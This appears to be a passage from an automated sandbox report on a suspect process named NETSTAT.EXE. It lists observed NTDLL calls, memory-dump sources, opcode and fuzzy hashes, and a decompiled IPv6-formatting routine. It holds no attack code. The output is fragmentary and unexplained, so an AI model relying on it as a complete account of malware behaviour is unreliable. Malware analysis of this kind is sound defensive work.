String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 31fafae2d52524b2f13fe96560036c70624e573cf19615e2feef33ea6585f3f8
Instruction ID: 3d7d60dc757f241e73b5ee2ccd95687a0c396a537f4aafa9fa405a3d6c47940d
Opcode Fuzzy Hash: 31fafae2d52524b2f13fe96560036c70624e573cf19615e2feef33ea6585f3f8
Instruction Fuzzy Hash: 55F0F632640601BFEB211A45EC06F23BF5AEB84730F150724F628565E1EA62F830D6F4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: NETSTAT.EXE PID: 6516 Parent PID: 3440 NETSTAT.EXECOMMON

Executed Functions

Function 00469F2A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00464B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00464B87,007A002E,00000000,00000060,00000000,00000000), ref: 00469F7D

Strings

HF, xrefs: 00469FAC, 00469FB8
.z`, xrefs: 00469F6D, 00469F78

Memory Dump Source

Source File: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`$HF
API String ID: 823142352-53315883
Opcode ID: 3627c27f62a3b8010574830eb18b126a815259faaff9ced5509d0a3a8663a23e
Instruction ID: 2ad82795589dee65ecba54d06da0c4c2e5043a380828fd5f8e5973de01eaf43f
Opcode Fuzzy Hash: 3627c27f62a3b8010574830eb18b126a815259faaff9ced5509d0a3a8663a23e
Instruction Fuzzy Hash: 5A119FB6214108AFCB08DF99DC90DEB77EEAF8C754F158249FA5DA3241D630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00469F30, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00464B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00464B87,007A002E,00000000,00000060,00000000,00000000), ref: 00469F7D

Strings

.z`, xrefs: 00469F6D, 00469F78

Memory Dump Source

Source File: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 148680508eb4cd02b97e9b37ecc0dd5c52123794b767e6178a527767eb1dc540
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 48F0B2B2210208ABCB08CF89DC95EEB77ADAF8C754F158248BA0D97241D630F8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0046A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( MF,?,?,00464D20,00000000,FFFFFFFF), ref: 0046A085

Strings

MF, xrefs: 0046A07C, 0046A084

Memory Dump Source

Source File: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: MF
API String ID: 3535843008-493111839
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: cf4ad2902a99221c1678f8c0a370abb2acb837fea0726d30ac0535c952d91a86
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: FCD01776200214ABD710EB99CC85FA77BADEF48B60F154599BA18AB242D530FA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 00469F82, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00464A01,?,?,?,?,00464A01,FFFFFFFF,?,BMF,?,00000000), ref: 0046A025

Memory Dump Source

Source File: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 2a37bc8465bcd3c567c1340e59dc0b24bc815b682bd50367140032fe139996bd
Instruction ID: c6aefb36a8f17e32da68b673e2552f6b22d52dc8bc6d04002bce8e37af12d66d
Opcode Fuzzy Hash: 2a37bc8465bcd3c567c1340e59dc0b24bc815b682bd50367140032fe139996bd
Instruction Fuzzy Hash: B0F01DB2200109ABDB08CF89DC91EEB77ADAF8C714F158649FA1D97241D634E812CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00469FE0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00464A01,?,?,?,?,00464A01,FFFFFFFF,?,BMF,?,00000000), ref: 0046A025

Memory Dump Source

Source File: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: b81756517533a007bd64cf7b9b268376dde2f00540b8c56022a8e835bb9c7ae9
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 4AF0A4B2210208ABCB14DF89DC91EEB77ADAF8C754F158249BA1DA7241D630E8118BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0046A10C, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00452D11,00002000,00003000,00000004), ref: 0046A149

Memory Dump Source

Source File: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: acb9e57b07dffd9642b011429991bfdd4735d10292ef9dddea74c89cfddfd82b
Instruction ID: 7f8d48e1848e9bb287e4c7da6033d8c333adfff75679f6a495bb0e2afb8d944c
Opcode Fuzzy Hash: acb9e57b07dffd9642b011429991bfdd4735d10292ef9dddea74c89cfddfd82b
Instruction Fuzzy Hash: 55F01CB6210108BBCB14DF89CC80EEB77ADAF88354F118549BA08A7241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0046A110, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00452D11,00002000,00003000,00000004), ref: 0046A149

Memory Dump Source

Source File: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 7ce6ec5068142263cc7fb8886c69d3dcece9fe4f06fbc368ab26e8f3ce5f8174
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 79F015B2210208ABCB14DF89CC81EAB77ADAF88754F118249BE08A7241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D09860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D0986A

Memory Dump Source

Source File: 00000007.00000002.414795721.0000000002CA0000.00000040.00000001.sdmp, Offset: 02CA0000, based on PE: true

Associated: 00000007.00000002.415818440.0000000002DBB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.415841954.0000000002DBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 108c4a07daedd95de8c5a8236261f8ddbe99157a8e4d309db117583485f90c58
Instruction ID: a2214e59a2b017bffe1a9ba5e6bce718056a553ea78a157b1fe0335518bac3e1
Opcode Fuzzy Hash: 108c4a07daedd95de8c5a8236261f8ddbe99157a8e4d309db117583485f90c58
Instruction Fuzzy Hash: 8390027124101427D11161595504707040B97D4281F91C812A04145B8D97968D92B161

Uniqueness

Uniqueness Score: -1.00%

Function 02D09910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D0991A

Memory Dump Source

Source File: 00000007.00000002.414795721.0000000002CA0000.00000040.00000001.sdmp, Offset: 02CA0000, based on PE: true

Associated: 00000007.00000002.415818440.0000000002DBB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.415841954.0000000002DBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f780f5d8f454652ea0ed551f6e10a58b073dcdb9d9c63ad3066944752e51580
Instruction ID: 601a79abcffdcd94c7bfc3eebe887821f7d348c49e0bf49033cc35fdc4b6836e
Opcode Fuzzy Hash: 4f780f5d8f454652ea0ed551f6e10a58b073dcdb9d9c63ad3066944752e51580
Instruction Fuzzy Hash: 869002B124101416D14071595404747040797D4341F51C411A50545B4E87998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 02D096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D096EA

Memory Dump Source

Source File: 00000007.00000002.414795721.0000000002CA0000.00000040.00000001.sdmp, Offset: 02CA0000, based on PE: true

Associated: 00000007.00000002.415818440.0000000002DBB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.415841954.0000000002DBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 73eedfc1e8d7e3ae0f56c9ae0bc79d7e977b79723741e8737818d3754bad2baf
Instruction ID: 11f8cdf65475b9dd1a582ac904da450e2c3799f66108b10d9da16516812ef99c
Opcode Fuzzy Hash: 73eedfc1e8d7e3ae0f56c9ae0bc79d7e977b79723741e8737818d3754bad2baf
Instruction Fuzzy Hash: 1890027124109816D1106159940474B040797D4341F55C811A44146B8D87D58CD17161

Uniqueness

Uniqueness Score: -1.00%

Function 02D09660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D0966A

Memory Dump Source

Source File: 00000007.00000002.414795721.0000000002CA0000.00000040.00000001.sdmp, Offset: 02CA0000, based on PE: true

Associated: 00000007.00000002.415818440.0000000002DBB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.415841954.0000000002DBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b67980a65c48d9d940b6c9f6dc3eee647ffa509b717bce188db6bc6ead9a079
Instruction ID: 8e7a22328e8ee25cd1564e7c389c54219c6a9e6689d78d2b5ee21441076618fa
Opcode Fuzzy Hash: 1b67980a65c48d9d940b6c9f6dc3eee647ffa509b717bce188db6bc6ead9a079
Instruction Fuzzy Hash: 5290027124101816D1807159540464B040797D5341F91C415A00156B4DCB558E9977E1

Uniqueness

Uniqueness Score: -1.00%

Function 02D09FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D09FEA

Memory Dump Source

Source File: 00000007.00000002.414795721.0000000002CA0000.00000040.00000001.sdmp, Offset: 02CA0000, based on PE: true

Associated: 00000007.00000002.415818440.0000000002DBB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.415841954.0000000002DBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7309321389ca2276a875e7b1c5ce04f70c26044d74883035b61604ff677c69b3
Instruction ID: 540724aee77ba57bc387e6b3a49cc7a524319f57497b3581c46a6a01c04039ef
Opcode Fuzzy Hash: 7309321389ca2276a875e7b1c5ce04f70c26044d74883035b61604ff677c69b3
Instruction Fuzzy Hash: A790027135115416D11061599404707040797D5241F51C811A08145B8D87D58CD17162

Uniqueness

Uniqueness Score: -1.00%

Function 02D095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D095DA

Memory Dump Source

Source File: 00000007.00000002.414795721.0000000002CA0000.00000040.00000001.sdmp, Offset: 02CA0000, based on PE: true

Associated: 00000007.00000002.415818440.0000000002DBB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.415841954.0000000002DBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 515b94c5437f40ffde4fc99c398c1dd706ef052dea03ed9cb0a6886babf6eba1
Instruction ID: c71149f5b924ed220ace733b14f6bfef3bc5e9bfb7e68e5e3094d18919b962b0
Opcode Fuzzy Hash: 515b94c5437f40ffde4fc99c398c1dd706ef052dea03ed9cb0a6886babf6eba1
Instruction Fuzzy Hash: FA9002A124201017410571595414617440B97E4241B51C421E10045F0DC6658CD17165

Uniqueness

Uniqueness Score: -1.00%

Function 0045AD4B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0045AD42

Strings

., xrefs: 0045AD78
l, xrefs: 0045AD7F

Memory Dump Source

Source File: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID: .$l
API String ID: 2234796835-2021555757
Opcode ID: b6d4f195393f6e273edd5795868c29266ae35dcefa257e36494ac1e59cdcfaef
Instruction ID: 0c4ab7d1d8bfaf11f40ed790bdb29d6d5e0043d6483e6ab34152b8cced4b6c46
Opcode Fuzzy Hash: b6d4f195393f6e273edd5795868c29266ae35dcefa257e36494ac1e59cdcfaef
Instruction Fuzzy Hash: CF2129719002099FCB20EF64C541AABB3B5EF55306F00865EE809C7A42F734E95CC786

Uniqueness

Uniqueness Score: -1.00%

Function 0046A236, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00464506,?,00464C7F,00464C7F,?,00464506,?,?,?,?,?,00000000,00000000,?), ref: 0046A22D
RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00453AF8), ref: 0046A26D

Strings

.z`, xrefs: 0046A25C, 0046A268

Memory Dump Source

Source File: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID: .z`
API String ID: 2488874121-1441809116
Opcode ID: 1b53b0690028fa73c43e51403fd9c2aa618d47d85d6616b618b0dd175e94603e
Instruction ID: 0109f6d28249794adb74a716382ff51c93f73bfe835e22ff55857b3b971ee1d4
Opcode Fuzzy Hash: 1b53b0690028fa73c43e51403fd9c2aa618d47d85d6616b618b0dd175e94603e
Instruction Fuzzy Hash: 55F08CB62102146BCA14EF64EC44EE7375C9F84664F00455AFE0C57602C631E9508AA1

Uniqueness

Uniqueness Score: -1.00%

Function 0046A240, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00453AF8), ref: 0046A26D

Strings

.z`, xrefs: 0046A25C, 0046A268

Memory Dump Source

Source File: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 7834dab3ffb0fd3f1416935840608648c02d08ac03fafab87d852c14cfe779cc
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: A6E04FB12102046BD714DF59CC45EA777ADEF88750F014559FE0857241D630F910CAF1

Uniqueness

Uniqueness Score: -1.00%

Function 0045ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0045AD42

Memory Dump Source

Source File: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: e3cd5c4db0597c13a36a0f1186f7e6d3a125332047fb9a142850906abfde767f
Instruction ID: aa08b3ec07fccbd83d2c56e46f1c391cdad60f693ae27af8b0055f57e3058b86
Opcode Fuzzy Hash: e3cd5c4db0597c13a36a0f1186f7e6d3a125332047fb9a142850906abfde767f
Instruction Fuzzy Hash: 920152B5D0010DA7DB10EAE5DC42F9EB3789B14309F004296ED0897241F635EB58CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0046A200, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00464506,?,00464C7F,00464C7F,?,00464506,?,?,?,?,?,00000000,00000000,?), ref: 0046A22D

Memory Dump Source

Source File: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 8302587624adb7aa20b9951e0be10b0e527c04f888add42777ba2a3463e48c58
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: B0E046B1210208ABDB14EF99CC41EA777ADEF88754F118559FE086B242C630F911CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 0046A3A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0045F1A2,0045F1A2,?,00000000,?,?), ref: 0046A3D0

Memory Dump Source

Source File: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: dd4bada9a5e21ccd62baa3eb9f79bc7ec9b5951b7898d2835bef393a6291deb5
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49CC85EE737ADAF88650F018155BA0867241D934F8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0046A272, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,00000000,?,?,?,00000001), ref: 0046A2A8

Memory Dump Source

Source File: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: cb9d7a8e1b0a0cb65dd813f3e8753ed75a2bb007aa13fd23410cfc59265a74e1
Instruction ID: cde7333ff7e8c3706dc014652c29bf7ac70c5e9fe4065fec1892f6f2f0e6dc7a
Opcode Fuzzy Hash: cb9d7a8e1b0a0cb65dd813f3e8753ed75a2bb007aa13fd23410cfc59265a74e1
Instruction Fuzzy Hash: 6DE02638204600AFD701AB24ECE1F837B64AF49300F28C88DE5A42F342C1356211CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0046A280, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,00000000,?,?,?,00000001), ref: 0046A2A8

Memory Dump Source

Source File: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: f61f892bcd576a338262d9cdc0deca15590d0aa494bc94732f5f058449060148
Instruction ID: bb7f9f6f46aa6ac7802daed54a09ef4e18efcfb87739700910f1b6a27803edec
Opcode Fuzzy Hash: f61f892bcd576a338262d9cdc0deca15590d0aa494bc94732f5f058449060148
Instruction Fuzzy Hash: A9D012716102147BD620DB99CC85FD7779CDF48750F018165BA1C6B241D531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 02D0967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D09694

Memory Dump Source

Source File: 00000007.00000002.414795721.0000000002CA0000.00000040.00000001.sdmp, Offset: 02CA0000, based on PE: true

Associated: 00000007.00000002.415818440.0000000002DBB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.415841954.0000000002DBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6bc1d4a232decfb281f464a56c519577cab27f0872b24be3385632e3ece6e8ed
Instruction ID: 686dcf4c29900e5d78f8b66c46cb1d34d8c1b7ae4c7dfcea89b8f15d7aacd462
Opcode Fuzzy Hash: 6bc1d4a232decfb281f464a56c519577cab27f0872b24be3385632e3ece6e8ed
Instruction Fuzzy Hash: 58B02B718010C0C9D600D3A006087173D01B7C0700F12C011D10202A1B0338C4C0F1B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02CC7CC0, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E02CC7CC0(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _t60;
				signed int _t65;
				void* _t70;
				void* _t73;
				signed int _t86;
				void* _t92;
				signed int _t94;
				intOrPtr _t101;
				signed int _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t115;
				intOrPtr _t116;
				signed char _t117;
				void* _t118;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;

				_t101 = _a8;
				_t120 = _a4;
				_t121 = 0;
				_t104 = _t101 + 0x2e;
				_v24 = 8;
				_v16 = _t104;
				if( *_t120 == 0) {
					__eflags =  *(_t120 + 2);
					if( *(_t120 + 2) != 0) {
						goto L1;
					}
					__eflags =  *(_t120 + 4);
					if( *(_t120 + 4) != 0) {
						goto L1;
					}
					__eflags =  *(_t120 + 6);
					if( *(_t120 + 6) != 0) {
						goto L1;
					}
					_t117 =  *(_t120 + 0xc) & 0x0000ffff;
					_v20 = _t117 >> 8;
					__eflags = _t117;
					if(_t117 == 0) {
						goto L1;
					}
					_t86 =  *(_t120 + 8) & 0x0000ffff;
					__eflags = _t86;
					if(_t86 != 0) {
						_v12 = 0xffff;
						__eflags = _t86 - _v12;
						if(_t86 != _v12) {
							goto L1;
						}
						__eflags =  *(_t120 + 0xa);
						if( *(_t120 + 0xa) != 0) {
							goto L1;
						}
						__eflags = _t104 - _t101;
						_push( *(_t120 + 0xf) & 0x000000ff);
						_push( *(_t120 + 0xe) & 0x000000ff);
						_push(_v20 & 0x000000ff);
						_t92 = E02D16B30(_t101, _t104 - _t101, "::ffff:0:%u.%u.%u.%u", _t117 & 0x000000ff);
						L29:
						return _t92 + _t101;
					}
					_t94 =  *(_t120 + 0xa) & 0x0000ffff;
					__eflags = _t94;
					if(_t94 == 0) {
						_t118 = 0x2ca48a4;
						L27:
						_push( *(_t120 + 0xf) & 0x000000ff);
						_push( *(_t120 + 0xe) & 0x000000ff);
						_push(_v20 & 0x000000ff);
						_push( *(_t120 + 0xc) & 0xff);
						_t92 = E02D16B30(_t101, _t104 - _t101, "::%hs%u.%u.%u.%u", _t118);
						goto L29;
					}
					__eflags = _t94 - 0xffff;
					if(_t94 != 0xffff) {
						goto L1;
					}
					_t118 = 0x2cbd700;
					goto L27;
				}
				L1:
				_t105 = _t121;
				_t60 = _t121;
				_v8 = _t105;
				_v20 = _t60;
				if(( *(_t120 + 8) & 0x0000fffd) == 0) {
					__eflags =  *(_t120 + 0xa) - 0xfe5e;
					if( *(_t120 + 0xa) == 0xfe5e) {
						_v24 = 6;
					}
				}
				_t115 = _t121;
				_t102 = _t60;
				do {
					if( *((intOrPtr*)(_t120 + _t115 * 2)) == _t121) {
						__eflags = _t115 - _t60 + 1 - _v8 - _t102;
						_t60 = _v20;
						if(__eflags <= 0) {
							_t105 = _v8;
						} else {
							_t49 = _t115 + 1; // 0x1
							_t105 = _t49;
							_t102 = _t60;
							_v8 = _t105;
						}
					} else {
						_t13 = _t115 + 1; // 0x1
						_t60 = _t13;
						_v20 = _t60;
					}
					_t115 = _t115 + 1;
				} while (_t115 < _v24);
				_v12 = _t102;
				_t103 = _a8;
				if(_t105 - _t102 > 1) {
					_t65 = _v12;
				} else {
					_t105 = _t121;
					_t65 = _t121;
					_v8 = _t105;
					_v12 = _t65;
				}
				do {
					if(_t121 < _t105) {
						__eflags = _t65 - _t121;
						if(_t65 > _t121) {
							goto L9;
						}
						_push("::");
						_push(_v16 - _t103);
						_push(_t103);
						_t70 = E02D16B30();
						_t105 = _v8;
						_t122 = _t122 + 0xc;
						_t121 = _t105 - 1;
						goto L13;
					}
					L9:
					if(_t121 != 0 && _t121 != _t105) {
						_push(":");
						_push(_v16 - _t103);
						_push(_t103);
						_t73 = E02D16B30();
						_t122 = _t122 + 0xc;
						_t103 = _t103 + _t73;
					}
					_t70 = E02D16B30(_t103, _v16 - _t103, "%x",  *(_t120 + _t121 * 2) & 0x0000ffff);
					_t105 = _v8;
					_t122 = _t122 + 0x10;
					L13:
					_t116 = _v24;
					_t103 = _t103 + _t70;
					_t65 = _v12;
					_t121 = _t121 + 1;
				} while (_t121 < _t116);
				if(_t116 < 8) {
					_push( *(_t120 + 0xf) & 0x000000ff);
					_push( *(_t120 + 0xe) & 0x000000ff);
					_push( *(_t120 + 0xd) & 0x000000ff);
					_t103 = _t103 + E02D16B30(_t103, _v16 - _t103, ":%u.%u.%u.%u",  *(_t120 + 0xc) & 0x000000ff);
				}
				return _t103;
			}

0x02cc7cc9
0x02cc7cce
0x02cc7cd1
0x02cc7cd3
0x02cc7cd6
0x02cc7cdd
0x02cc7ce3
0x02d22bbb
0x02d22bbf
0x00000000
0x00000000
0x02d22bc5
0x02d22bc9
0x00000000
0x00000000
0x02d22bcf
0x02d22bd3
0x00000000
0x00000000
0x02d22bd9
0x02d22be2
0x02d22be5
0x02d22be8
0x00000000
0x00000000
0x02d22bee
0x02d22bf2
0x02d22bf5
0x02d22c74
0x02d22c7b
0x02d22c7f
0x00000000
0x00000000
0x02d22c85
0x02d22c89
0x00000000
0x00000000
0x02d22c4b
0x02d22c4d
0x02d22c52
0x02d22c59
0x02d22c65
0x02d22c6d
0x00000000
0x02d22c6d
0x02d22bf7
0x02d22bfb
0x02d22bfe
0x02d22c15
0x02d22c1a
0x02d22c20
0x02d22c25
0x02d22c2c
0x02d22c34
0x02d22c3d
0x00000000
0x02d22c42
0x02d22c05
0x02d22c08
0x00000000
0x00000000
0x02d22c0e
0x00000000
0x02d22c0e
0x02cc7ce9
0x02cc7cee
0x02cc7cf0
0x02cc7cf2
0x02cc7cf5
0x02cc7cfc
0x02d22c96
0x02d22c9a
0x02d22ca0
0x02d22ca0
0x02d22c9a
0x02cc7d02
0x02cc7d04
0x02cc7d06
0x02cc7d0a
0x02d22cb6
0x02d22cb8
0x02d22cbb
0x02d22cca
0x02d22cbd
0x02d22cbd
0x02d22cbd
0x02d22cc0
0x02d22cc2
0x02d22cc2
0x02cc7d10
0x02cc7d10
0x02cc7d10
0x02cc7d13
0x02cc7d13
0x02cc7d16
0x02cc7d17
0x02cc7d1e
0x02cc7d23
0x02cc7d29
0x02cc7d9f
0x02cc7d2b
0x02cc7d2b
0x02cc7d2d
0x02cc7d2f
0x02cc7d32
0x02cc7d32
0x02cc7d35
0x02cc7d37
0x02d22cd2
0x02d22cd4
0x00000000
0x00000000
0x02d22cdd
0x02d22ce4
0x02d22ce5
0x02d22ce6
0x02d22ceb
0x02d22cee
0x02d22cf1
0x00000000
0x02d22cf1
0x02cc7d3d
0x02cc7d3f
0x02cc7d48
0x02cc7d4f
0x02cc7d50
0x02cc7d51
0x02cc7d56
0x02cc7d59
0x02cc7d59
0x02cc7d73
0x02cc7d78
0x02cc7d7b
0x02cc7d7e
0x02cc7d7e
0x02cc7d81
0x02cc7d83
0x02cc7d86
0x02cc7d87
0x02cc7d8e
0x02d22cfd
0x02d22d02
0x02d22d07
0x02d22d21
0x02d22d21
0x00000000

APIs

___swprintf_l.LIBCMT ref: 02CC7D51
___swprintf_l.LIBCMT ref: 02CC7D73
___swprintf_l.LIBCMT ref: 02D22C3D

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 02D22C5E
ffff:, xrefs: 02D22C0E, 02D22C35
::%hs%u.%u.%u.%u, xrefs: 02D22C36
:%u.%u.%u.%u, xrefs: 02D22D10

Memory Dump Source

